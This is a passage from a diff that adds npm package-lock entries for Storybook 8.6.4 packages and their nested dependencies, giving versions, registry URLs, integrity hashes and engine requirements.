"sha512-hlq8tAfn0m/61p4BVRcPzIGr6LKiMwo4VM6dGi6pt4qcRkmNzTcWq6eCEjEh+qXjkMDvPlOFFSGwQjoEa6gyMA==", + "dev": true, + "license": "ISC", + "bin": { + "semver": "bin/semver.js" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/@storybook/builder-webpack5/node_modules/url": { + "version": "0.11.4", + "resolved": "https://registry.npmjs.org/url/-/url-0.11.4.tgz", + "integrity": "sha512-oCwdVC7mTuWiPyjLUz/COz5TLk6wgp0RCsN+wHZ2Ekneac9w8uuV0njcbbie2ME+Vs+d6duwmYuR3HgQXs1fOg==", + "dev": true, + "license": "MIT", + "dependencies": { + "punycode": "^1.4.1", + "qs": "^6.12.3" + }, + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/@storybook/builder-webpack5/node_modules/webpack-dev-middleware": { + "version": "6.1.3", + "resolved": "https://registry.npmjs.org/webpack-dev-middleware/-/webpack-dev-middleware-6.1.3.tgz", + "integrity": "sha512-A4ChP0Qj8oGociTs6UdlRUGANIGrCDL3y+pmQMc+dSsraXHCatFpmMey4mYELA+juqwUqwQsUgJJISXl1KWmiw==", + "dev": true, + "license": "MIT", + "dependencies": { + "colorette": "^2.0.10", + "memfs": "^3.4.12", + "mime-types": "^2.1.31", + "range-parser": "^1.2.1", + "schema-utils": "^4.0.0" + }, + "engines": { + "node": ">= 14.15.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/webpack" + }, + "peerDependencies": { + "webpack": "^5.0.0" + }, + "peerDependenciesMeta": { + "webpack": { + "optional": true + } + } + }, + "node_modules/@storybook/cli": { + "version": "8.6.4", + "resolved": "https://registry.npmjs.org/@storybook/cli/-/cli-8.6.4.tgz", + "integrity": "sha512-iVw4B2Pe4/ERDkDeaXtXamFXatNgvtiA6G9p3wUpVSlxjgKW/JbjSwKAMTCsgDIj4dCMm8i0fzmiYXeg5Yprng==", + "dev": true, + "license": "MIT", + "dependencies": { + "@babel/core": "^7.24.4", + "@babel/types": "^7.24.0", + "@storybook/codemod": "8.6.4", + "@types/semver": "^7.3.4", + "commander": "^12.1.0", + "create-storybook": "8.6.4", + "cross-spawn": "^7.0.3", + "envinfo": "^7.7.3", + "fd-package-json": "^1.2.0", + "find-up": "^5.0.0", + "giget": "^1.0.0", + "glob": "^10.0.0", + "globby": "^14.0.1", + "jscodeshift": "^0.15.1", + "leven": "^3.1.0", + "p-limit": "^6.2.0", + "prompts": "^2.4.0", + "semver": "^7.3.7", + "storybook": "8.6.4", + "tiny-invariant": "^1.3.1", + "ts-dedent": "^2.0.0" + }, + "bin": { + "cli": "bin/index.cjs" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/storybook" + } + }, + "node_modules/@storybook/cli/node_modules/ansi-styles": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", + "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", + "dev": true, + "license": "MIT", + "dependencies": { + "color-convert": "^2.0.1" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/chalk/ansi-styles?sponsor=1" + } + }, + "node_modules/@storybook/cli/node_modules/brace-expansion": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-2.0.1.tgz", + "integrity": "sha512-XnAIvQ8eM+kC6aULx6wuQiwVsnzsi9d3WxzV3FpWTGA19F621kwdbsAcFKXgKUHZWsy+mY6iL1sHTxWEFCytDA==", + "dev": true, + "license": "MIT", + "dependencies": { + "balanced-match": "^1.0.0" + } + }, + "node_modules/@storybook/cli/node_modules/chalk": { + "version": "4.1.2", + "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", + "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", + "dev": true, + "license": "MIT", + "dependencies": { + "ansi-styles": "^4.1.0", + "supports-color": "^7.1.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/chalk/chalk?sponsor=1" + } + }, + "node_modules/@storybook/cli/node_modules/commander": { + "version": "12.1.0", + "resolved": "https://registry.npmjs.org/commander/-/commander-12.1.0.tgz", + "integrity": "sha512-Vw8qHK3bZM9y/P10u3Vib8o/DdkvA2OtPtZvD871QKjy74Wj1WSKFILMPRPSdUSx5RFK1arlJzEtA4PkFgnbuA==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=18" + } + }, + "node_modules/@storybook/cli/node_modules/foreground-child": { + "version": "3.3.1", + "resolved": "https://registry.npmjs.org/foreground-child/-/foreground-child-3.3.1.tgz", + "integrity": "sha512-gIXjKqtFuWEgzFRJA9WCQeSJLZDjgJUOMCMzxtvFq/37KojM1BFGufqsCy0r4qSQmYLsZYMeyRqzIWOMup03sw==", + "dev": true, + "license": "ISC", + "dependencies": { + "cross-spawn": "^7.0.6", + "signal-exit": "^4.0.1" + }, + "engines": { + "node": ">=14" + }, + "funding": { + "url": "https://github.com/sponsors/isaacs" + } + }, + "node_modules/@storybook/cli/node_modules/glob": { + "version": "10.4.5", + "resolved": "https://registry.npmjs.org/glob/-/glob-10.4.5.tgz", + "integrity": "sha512-7Bv8RF0k6xjo7d4A/PxYLbUCfb6c+Vpd2/mB2yRDlew7Jb5hEXiCD9ibfO7wpk8i4sevK6DFny9h7EYbM3/sHg==", + "dev": true, + "license": "ISC", + "dependencies": { + "foreground-child": "^3.1.0", + "jackspeak": "^3.1.2", + "minimatch": "^9.0.4", + "minipass": "^7.1.2", + "package-json-from-dist": "^1.0.0", + "path-scurry": "^1.11.1" + }, + "bin": { + "glob": "dist/esm/bin.mjs" + }, + "funding": { + "url": "https://github.com/sponsors/isaacs" + } + }, + "node_modules/@storybook/cli/node_modules/globby": { + "version": "14.1.0", + "resolved": "https://registry.npmjs.org/globby/-/globby-14.1.0.tgz", + "integrity": "sha512-0Ia46fDOaT7k4og1PDW4YbodWWr3scS2vAr2lTbsplOt2WkKp0vQbkI9wKis/T5LV/dqPjO3bpS/z6GTJB82LA==", + "dev": true, + "license": "MIT", + "dependencies": { + "@sindresorhus/merge-streams": "^2.1.0", + "fast-glob": "^3.3.3", + "ignore": "^7.0.3", + "path-type": "^6.0.0", + "slash": "^5.1.0", + "unicorn-magic": "^0.3.0" + }, + "engines": { + "node": ">=18" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/@storybook/cli/node_modules/ignore": { + "version": "7.0.3", + "resolved": "https://registry.npmjs.org/ignore/-/ignore-7.0.3.tgz", + "integrity": "sha512-bAH5jbK/F3T3Jls4I0SO1hmPR0dKU0a7+SY6n1yzRtG54FLO8d6w/nxLFX2Nb7dBu6cCWXPaAME6cYqFUMmuCA==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">= 4" + } + }, + "node_modules/@storybook/cli/node_modules/jscodeshift": { + "version": "0.15.2", + "resolved": "https://registry.npmjs.org/jscodeshift/-/jscodeshift-0.15.2.tgz", + "integrity": "sha512-FquR7Okgmc4Sd0aEDwqho3rEiKR3BdvuG9jfdHjLJ6JQoWSMpavug3AoIfnfWhxFlf+5pzQh8qjqz0DWFrNQzA==", + "dev": true, + "license": "MIT", + "dependencies": { + "@babel/core": "^7.23.0", + "@babel/parser": "^7.23.0", + "@babel/plugin-transform-class-properties": "^7.22.5", + "@babel/plugin-transform-modules-commonjs": "^7.23.0", + "@babel/plugin-transform-nullish-coalescing-operator": "^7.22.11", + "@babel/plugin-transform-optional-chaining": "^7.23.0", + "@babel/plugin-transform-private-methods": "^7.22.5", + "@babel/preset-flow": "^7.22.15", + "@babel/preset-typescript": "^7.23.0", + "@babel/register": "^7.22.15", + "babel-core": "^7.0.0-bridge.0", + "chalk": "^4.1.2", + "flow-parser": "0.*", + "graceful-fs": "^4.2.4", + "micromatch": "^4.0.4", + "neo-async": "^2.5.0", + "node-dir": "^0.1.17", + "recast": "^0.23.3", + "temp": "^0.8.4", + "write-file-atomic": "^2.3.0" + }, + "bin": { + "jscodeshift": "bin/jscodeshift.js" + }, + "peerDependencies": { + "@babel/preset-env": "^7.1.6" + }, + "peerDependenciesMeta": { + "@babel/preset-env": { + "optional": true + } + } + }, + "node_modules/@storybook/cli/node_modules/minimatch": { + "version": "9.0.5", + "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-9.0.5.tgz", + "integrity": "sha512-G6T0ZX48xgozx7587koeX9Ys2NYy6Gmv//P89sEte9V9whIapMNF4idKxnW2QtCcLiTWlb/wfCabAtAFWhhBow==", + "dev": true, + "license": "ISC", + "dependencies": { + "brace-expansion": "^2.0.1" + }, + "engines": { + "node": ">=16 || 14 >=14.17" + }, + "funding": { + "url": "https://github.com/sponsors/isaacs" + } + }, + "node_modules/@storybook/cli/node_modules/minipass": { + "version": "7.1.2", + "resolved": "https://registry.npmjs.org/minipass/-/minipass-7.1.2.tgz", + "integrity": "sha512-qOOzS1cBTWYF4BH8fVePDBOO9iptMnGUEZwNc/cMWnTV2nVLZ7VoNWEPHkYczZA0pdoA7dl6e7FL659nX9S2aw==", + "dev": true, + "license": "ISC", + "engines": { + "node": ">=16 || 14 >=14.17" + } + }, + "node_modules/@storybook/cli/node_modules/p-limit": { + "version": "6.2.0", + "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-6.2.0.tgz", + "integrity": "sha512-kuUqqHNUqoIWp/c467RI4X6mmyuojY5jGutNU0wVTmEOOfcuwLqyMVoAi9MKi2Ak+5i9+nhmrK4ufZE8069kHA==", + "dev": true, + "license": "MIT", + "dependencies": { + "yocto-queue": "^1.1.1" + }, + "engines": { + "node": ">=18" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/@storybook/cli/node_modules/path-type": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/path-type/-/path-type-6.0.0.tgz", + "integrity": "sha512-Vj7sf++t5pBD637NSfkxpHSMfWaeig5+DKWLhcqIYx6mWQz5hdJTGDVMQiJcw1ZYkhs7AazKDGpRVji1LJCZUQ==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=18" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/@storybook/cli/node_modules/semver": { + "version": "7.7.1", + "resolved": "https://registry.npmjs.org/semver/-/semver-7.7.1.tgz", + "integrity": "sha512-hlq8tAfn0m/61p4BVRcPzIGr6LKiMwo4VM6dGi6pt4qcRkmNzTcWq6eCEjEh+qXjkMDvPlOFFSGwQjoEa6gyMA==", + "dev": true, + "license": "ISC", + "bin": { + "semver": "bin/semver.js" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/@storybook/cli/node_modules/signal-exit": { + "version": "4.1.0", + "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-4.1.0.tgz", + "integrity": "sha512-bzyZ1e88w9O1iNJbKnOlvYTrWPDl46O1bG0D3XInv+9tkPrxrN8jUUTiFlDkkmKWgn1M6CfIA13SuGqOa9Korw==", + "dev": true, + "license": "ISC", + "engines": { + "node": ">=14" + }, + "funding": { + "url": "https://github.com/sponsors/isaacs" + } + }, + "node_modules/@storybook/cli/node_modules/slash": { + "version": "5.1.0", + "resolved": "https://registry.npmjs.org/slash/-/slash-5.1.0.tgz", + "integrity": "sha512-ZA6oR3T/pEyuqwMgAKT0/hAv8oAXckzbkmR0UkUosQ+Mc4RxGoJkRmwHgHufaenlyAgE1Mxgpdcrf75y6XcnDg==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=14.16" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/@storybook/cli/node_modules/supports-color": { + "version": "7.2.0", + "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", + "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", + "dev": true, + "license": "MIT", + "dependencies": { + "has-flag": "^4.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/@storybook/cli/node_modules/write-file-atomic": { + "version": "2.4.3", + "resolved": "https://registry.npmjs.org/write-file-atomic/-/write-file-atomic-2.4.3.tgz", + "integrity": "sha512-GaETH5wwsX+GcnzhPgKcKjJ6M2Cq3/iZp1WyY/X1CSqrW+jVNM9Y7D8EC2sM4ZG/V8wZlSniJnCKWPmBYAucRQ==", + "dev": true, + "license": "ISC", + "dependencies": { + "graceful-fs": "^4.1.11", + "imurmurhash": "^0.1.4", + "signal-exit": "^3.0.2" + } + }, + "node_modules/@storybook/cli/node_modules/write-file-atomic/node_modules/signal-exit": { + "version": "3.0.7", + "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-3.0.7.tgz", + "integrity": "sha512-wnD2ZE+l+SPC/uoS0vXeE9L1+0wuaMqKlfz9AMUo38JsyLSBWSFcHR1Rri62LZc12vLr1gb3jl7iwQhgwpAbGQ==", + "dev": true, + "license": "ISC" + }, + "node_modules/@storybook/cli/node_modules/yocto-queue": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/yocto-queue/-/yocto-queue-1.2.0.tgz", + "integrity": "sha512-KHBC7z61OJeaMGnF3wqNZj+GGNXOyypZviiKpQeiHirG5Ib1ImwcLBH70rbMSkKfSmUNBsdf2PwaEJtKvgmkNw==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=12.20" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/@storybook/codemod": { + "version": "8.6.4", + "resolved": "https://registry.npmjs.org/@storybook/codemod/-/codemod-8.6.4.tgz", + "integrity": "sha512-HVB7py6vKB9OMzQ02aAhcqmyT/IDlYrT1960HO6LWRhcpztnBlOHAAlhM91DN8yqN0K47B+GsaN5eDzCT8ggBw==", + "dev": true, + "license": "MIT", + "dependencies": { + "@babel/core": "^7.24.4", + "@babel/preset-env": "^7.24.4", + "@babel/types": "^7.24.0", + "@storybook/core": "8.6.4", + "@types/cross-spawn": "^6.0.2", + "cross-spawn": "^7.0.3", + "es-toolkit": "^1.22.0", + "globby": "^14.0.1", + "jscodeshift": "^0.15.1", + "prettier": "^3.1.1", + "recast": "^0.23.5", + "tiny-invariant": "^1.3.1" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/storybook" + } + }, + "node_modules/@storybook/codemod/node_modules/ansi-styles": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", + "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", + "dev": true, + "license": "MIT", + "dependencies": { + "color-convert": "^2.0.1" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/chalk/ansi-styles?sponsor=1" + } + }, + "node_modules/@storybook/codemod/node_modules/chalk": { + "version": "4.1.2", + "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", + "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", + "dev": true, + "license": "MIT", + "dependencies": { + "ansi-styles": "^4.1.0", + "supports-color": "^7.1.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/chalk/chalk?sponsor=1" + } + }, + "node_modules/@storybook/codemod/node_modules/globby": { + "version": "14.1.0", + "resolved": "https://registry.npmjs.org/globby/-/globby-14.1.0.tgz", + "integrity": "sha512-0Ia46fDOaT7k4og1PDW4YbodWWr3scS2vAr2lTbsplOt2WkKp0vQbkI9wKis/T5LV/dqPjO3bpS/z6GTJB82LA==", + "dev": true, + "license": "MIT", + "dependencies": { + "@sindresorhus/merge-streams": "^2.1.0", + "fast-glob": "^3.3.3", + "ignore": "^7.0.3", + "path-type": "^6.0.0", + "slash": "^5.1.0", + "unicorn-magic": "^0.3.0" + }, + "engines": { + "node": ">=18" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/@storybook/codemod/node_modules/ignore": { + "version": "7.0.3", + "resolved": "https://registry.npmjs.org/ignore/-/ignore-7.0.3.tgz", + "integrity": "sha512-bAH5jbK/F3T3Jls4I0SO1hmPR0dKU0a7+SY6n1yzRtG54FLO8d6w/nxLFX2Nb7dBu6cCWXPaAME6cYqFUMmuCA==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">= 4" + } + }, + "node_modules/@storybook/codemod/node_modules/jscodeshift": { + "version": "0.15.2", + "resolved": "https://registry.npmjs.org/jscodeshift/-/jscodeshift-0.15.2.tgz", + "integrity": "sha512-FquR7Okgmc4Sd0aEDwqho3rEiKR3BdvuG9jfdHjLJ6JQoWSMpavug3AoIfnfWhxFlf+5pzQh8qjqz0DWFrNQzA==", + "dev": true, + "license": "MIT", + "dependencies": { + "@babel/core": "^7.23.0", + "@babel/parser": "^7.23.0", + "@babel/plugin-transform-class-properties": "^7.22.5", + "@babel/plugin-transform-modules-commonjs": "^7.23.0", + "@babel/plugin-transform-nullish-coalescing-operator": "^7.22.11", + "@babel/plugin-transform-optional-chaining": "^7.23.0", + "@babel/plugin-transform-private-methods": "^7.22.5", + "@babel/preset-flow": "^7.22.15", + "@babel/preset-typescript": "^7.23.0", + "@babel/register": "^7.22.15", + "babel-core": "^7.0.0-bridge.0", + "chalk": "^4.1.2", + "flow-parser": "0.*", + "graceful-fs": "^4.2.4", + "micromatch": "^4.0.4", + "neo-async": "^2.5.0", + "node-dir": "^0.1.17", + "recast": "^0.23.3", + "temp": "^0.8.4", + "write-file-atomic": "^2.3.0" + }, + "bin": { + "jscodeshift": "bin/jscodeshift.js" + }, + "peerDependencies": { + "@babel/preset-env": "^7.1.6" + }, + "peerDependenciesMeta": { + "@babel/preset-env": { + "optional": true + } + } + }, + "node_modules/@storybook/codemod/node_modules/path-type": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/path-type/-/path-type-6.0.0.tgz", + "integrity": "sha512-Vj7sf++t5pBD637NSfkxpHSMfWaeig5+DKWLhcqIYx6mWQz5hdJTGDVMQiJcw1ZYkhs7AazKDGpRVji1LJCZUQ==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=18" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/@storybook/codemod/node_modules/slash": { + "version": "5.1.0", + "resolved": "https://registry.npmjs.org/slash/-/slash-5.1.0.tgz", + "integrity": "sha512-ZA6oR3T/pEyuqwMgAKT0/hAv8oAXckzbkmR0UkUosQ+Mc4RxGoJkRmwHgHufaenlyAgE1Mxgpdcrf75y6XcnDg==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=14.16" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/@storybook/codemod/node_modules/supports-color": { + "version": "7.2.0", + "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", + "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", + "dev": true, + "license": "MIT", + "dependencies": { + "has-flag": "^4.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/@storybook/codemod/node_modules/write-file-atomic": { + "version": "2.4.3", + "resolved": "https://registry.npmjs.org/write-file-atomic/-/write-file-atomic-2.4.3.tgz", + "integrity": "sha512-GaETH5wwsX+GcnzhPgKcKjJ6M2Cq3/iZp1WyY/X1CSqrW+jVNM9Y7D8EC2sM4ZG/V8wZlSniJnCKWPmBYAucRQ==", + "dev": true, + "license": "ISC", + "dependencies": { + "graceful-fs": "^4.1.11", + "imurmurhash": "^0.1.4", + "signal-exit": "^3.0.2" + } + }, + "node_modules/@storybook/components": { + "version": "8.6.4", + "resolved": "https://registry.npmjs.org/@storybook/components/-/components-8.6.4.tgz", + "integrity": "sha512-91VEVFWOgHkEFoNFMk6gs1AuOE9Yp7N283BXQOW+AgP+atpzED6t/fIBPGqJ2ewAuzLJ+cFOrasSzoNwVfg3Jg==", + "dev": true, + "license": "MIT", + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/storybook" + }, + "peerDependencies": { + "storybook": "^8.2.0 || ^8.3.0-0 || ^8.4.0-0 || ^8.5.0-0 || ^8.6.0-0" + } + }, + "node_modules/@storybook/core": { + "version": "8.6.4", + "resolved": "https://registry.npmjs.org/@storybook/core/-/core-8.6.4.tgz", + "integrity": "sha512-glDbjEBi3wokw1T+KQtl93irHO9N0LCwgylWfWVXYDdQjUJ7pGRQGnw73gPX7Ds9tg3myXFC83GjmY94UYSMbA==", + "dev": true, + "license": "MIT", + "dependencies": { + "@storybook/theming": "8.6.4", + "better-opn": "^3.0.2", + "browser-assert": "^1.2.1", + "esbuild": "^0.18.0 || ^0.19.0 || ^0.20.0 || ^0.21.0 || ^0.22.0 || ^0.23.0 || ^0.24.0 || ^0.25.0", + "esbuild-register": "^3.5.0", + "jsdoc-type-pratt-parser": "^4.0.0", + "process": "^0.11.10", + "recast": "^0.23.5", + "semver": "^7.6.2", + "util": "^0.12.5", + "ws": "^8.2.3" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/storybook" + }, + "peerDependencies": { + "prettier": "^2 || ^3" + }, + "peerDependenciesMeta": { + "prettier": { + "optional": true + } + } + }, + "node_modules/@storybook/core-webpack": { + "version": "8.6.4", + "resolved": "https://registry.npmjs.org/@storybook/core-webpack/-/core-webpack-8.6.4.tgz", + "integrity": "sha512-/E+NDs4Ls2KQhQJyEbqyddvcevPGCNbBIRoR691gq2lnZV7lYFfhpGfYlXL1uSoA3WUWmql/gBsa2/O3vB+HKg==", + "dev": true, + "license": "MIT", + "dependencies": { + "ts-dedent": "^2.0.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/storybook" + }, + "peerDependencies": { + "storybook": "^8.6.4" + } + }, + "node_modules/@storybook/core/node_modules/semver": { + "version": "7.7.1", + "resolved": "https://registry.npmjs.org/semver/-/semver-7.7.1.tgz", + "integrity": "sha512-hlq8tAfn0m/61p4BVRcPzIGr6LKiMwo4VM6dGi6pt4qcRkmNzTcWq6eCEjEh+qXjkMDvPlOFFSGwQjoEa6gyMA==", + "dev": true, + "license": "ISC", + "bin": { + "semver": "bin/semver.js" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/@storybook/csf-plugin": { + "version": "8.6.4", + "resolved": "https://registry.npmjs.org/@storybook/csf-plugin/-/csf-plugin-8.6.4.tgz", + "integrity": "sha512-7UpEp4PFTy1iKjZiRaYMG7zvnpLIRPyD0+lUJUlLYG4UIemV3onvnIi1Je1tSZ4hfTup+ulom7JLztVSHZGRMg==", + "dev": true, + "license": "MIT", + "dependencies": { + "unplugin": "^1.3.1" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/storybook" + }, + "peerDependencies": { + "storybook": "^8.6.4" + } + }, + "node_modules/@storybook/global": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/@storybook/global/-/global-5.0.0.tgz", + "integrity": "sha512-FcOqPAXACP0I3oJ/ws6/rrPT9WGhu915Cg8D02a9YxLo0DE9zI+a9A5gRGvmQ09fiWPukqI8ZAEoQEdWUKMQdQ==", + "dev": true, + "license": "MIT" + }, + "node_modules/@storybook/icons": { + "version": "1.3.2", + "resolved": "https://registry.npmjs.org/@storybook/icons/-/icons-1.3.2.tgz", + "integrity": "sha512-t3xcbCKkPvqyef8urBM0j/nP6sKtnlRkVgC+8JTbTAZQjaTmOjes3byEgzs89p4B/K6cJsg9wLW2k3SknLtYJw==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=14.0.0" + }, + "peerDependencies": { + "react": "^16.8.0 || ^17.0.0 || ^18.0.0 || ^19.0.0-beta", + "react-dom": "^16.8.0 || ^17.0.0 || ^18.0.0 || ^19.0.0-beta" + } + }, + "node_modules/@storybook/instrumenter": { + "version": "8.6.4", + "resolved": "https://registry.npmjs.org/@storybook/instrumenter/-/instrumenter-8.6.4.tgz", + "integrity": "sha512-8OtIWLhayTUdqJEeXiPm6l3LTdSkWgQzzV2l2HIe4Adedeot+Rkwu6XHmyRDpnb0+Ish6zmMDqtJBxC2PQsy6Q==", + "dev": true, + "license": "MIT", + "dependencies": { + "@storybook/global": "^5.0.0", + "@vitest/utils": "^2.1.1" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/storybook" + }, + "peerDependencies": { + "storybook": "^8.6.4" + } + }, + "node_modules/@storybook/manager-api": { + "version": "8.6.4", + "resolved": "https://registry.npmjs.org/@storybook/manager-api/-/manager-api-8.6.4.tgz", + "integrity": "sha512-w/Nn/VznfbIg2oezDfzZNwSTDY5kBZbzxVBHLCnIcyu2AKt2Yto3pfGi60SikFcTrsClaAKT7D92kMQ9qdQNQQ==", + "dev": true, + "license": "MIT", + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/storybook" + }, + "peerDependencies": { + "storybook": "^8.2.0 || ^8.3.0-0 || ^8.4.0-0 || ^8.5.0-0 || ^8.6.0-0" + } + }, + "node_modules/@storybook/node-logger": { + "version": "8.0.4", + "resolved": "https://registry.npmjs.org/@storybook/node-logger/-/node-logger-8.0.4.tgz", + "integrity": "sha512-cALLHuX53vLQsoJamGRlquh2pfhPq9copXou2JTmFT6mrCcipo77SzhBDfeeuhaGv6vUWPfmGjPBEHXWGPe4+g==", + "dev": true, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/storybook" + } + }, + "node_modules/@storybook/preset-react-webpack": { + "version": "8.6.4", + "resolved": "https://registry.npmjs.org/@storybook/preset-react-webpack/-/preset-react-webpack-8.6.4.tgz", + "integrity": "sha512-rFd1NvSE2ZP5ZFEqH7wdXXlvnyNChSMp+w4FyGSCgFQOwQKZhhWPPyloi3gGSWztFV9qpzC/ri7TTvG6ptqPPw==", + "dev": true, + "license": "MIT", + "dependencies": { + "@storybook/core-webpack": "8.6.4", + "@storybook/react": "8.6.4", + "@storybook/react-docgen-typescript-plugin": "1.0.6--canary.9.0c3f3b7.0", + "@types/semver": "^7.3.4", + "find-up": "^5.0.0", + "magic-string": "^0.30.5", + "react-docgen": "^7.0.0", + "resolve": "^1.22.8", + "semver": "^7.3.7", + "tsconfig-paths": "^4.2.0", + "webpack": "5" + }, + "engines": { + "node": ">=18.0.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/storybook" + }, + "peerDependencies": { + "react": "^16.8.0 || ^17.0.0 || ^18.0.0 || ^19.0.0-beta", + "react-dom": "^16.8.0 || ^17.0.0 || ^18.0.0 || ^19.0.0-beta", + "storybook": "^8.6.4" + }, + "peerDependenciesMeta": { + "typescript": { + "optional": true + } + } + }, + "node_modules/@storybook/preset-react-webpack/node_modules/semver": { + "version": "7.7.1", + "resolved": "https://registry.npmjs.org/semver/-/semver-7.7.1.tgz", + "integrity": "sha512-hlq8tAfn0m/61p4BVRcPzIGr6LKiMwo4VM6dGi6pt4qcRkmNzTcWq6eCEjEh+qXjkMDvPlOFFSGwQjoEa6gyMA==", + "dev": true, + "license": "ISC", + "bin": { + "semver": "bin/semver.js" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/@storybook/preset-react-webpack/node_modules/tsconfig-paths": { + "version": "4.2.0", + "resolved": "https://registry.npmjs.org/tsconfig-paths/-/tsconfig-paths-4.2.0.tgz", + "integrity": "sha512-NoZ4roiN7LnbKn9QqE1amc9DJfzvZXxF4xDavcOWt1BPkdx+m+0gJuPM+S0vCe7zTJMYUP0R8pO2XMr+Y8oLIg==", + "dev": true, + "license": "MIT", + "dependencies": { + "json5": "^2.2.2", + "minimist": "^1.2.6", + "strip-bom": "^3.0.0" + }, + "engines": { + "node": ">=6" + } + }, + "node_modules/@storybook/preview-api": { + "version": "8.6.4", + "resolved": "https://registry.npmjs.org/@storybook/preview-api/-/preview-api-8.6.4.tgz", + "integrity": "sha512-5HBfxggzxGz0dg2c61NpPiQJav7UAmzsQlzmI5SzWOS6lkaylcDG8giwKzASVCXVWBxNji9qIDFM++UH090aDg==", + "dev": true, + "license": "MIT", + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/storybook" + }, + "peerDependencies": { + "storybook": "^8.2.0 || ^8.3.0-0 || ^8.4.0-0 || ^8.5.0-0 || ^8.6.0-0" + } + }, + "node_modules/@storybook/react": { + "version": "8.6.4", + "resolved": "https://registry.npmjs.org/@storybook/react/-/react-8.6.4.tgz", + "integrity": "sha512-pfv4hMhu3AScOh0l86uIzmXLSQ0XA/e0reIVwQcxKht6miaKArhx9GkS4mMp6SO23ZoV5G/nfLgUaMVPVE0ZPg==", + "dev": true, + "license": "MIT", + "dependencies": { + "@storybook/components": "8.6.4", + "@storybook/global": "^5.0.0", + "@storybook/manager-api": "8.6.4", + "@storybook/preview-api": "8.6.4", + "@storybook/react-dom-shim": "8.6.4", + "@storybook/theming": "8.6.4" + }, + "engines": { + "node": ">=18.0.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/storybook" + }, + "peerDependencies": { + "@storybook/test": "8.6.4", + "react": "^16.8.0 || ^17.0.0 || ^18.0.0 || ^19.0.0-beta", + "react-dom": "^16.8.0 || ^17.0.0 || ^18.0.0 || ^19.0.0-beta", + "storybook": "^8.6.4", + "typescript": ">= 4.2.x" + }, + "peerDependenciesMeta": { + "@storybook/test": { + 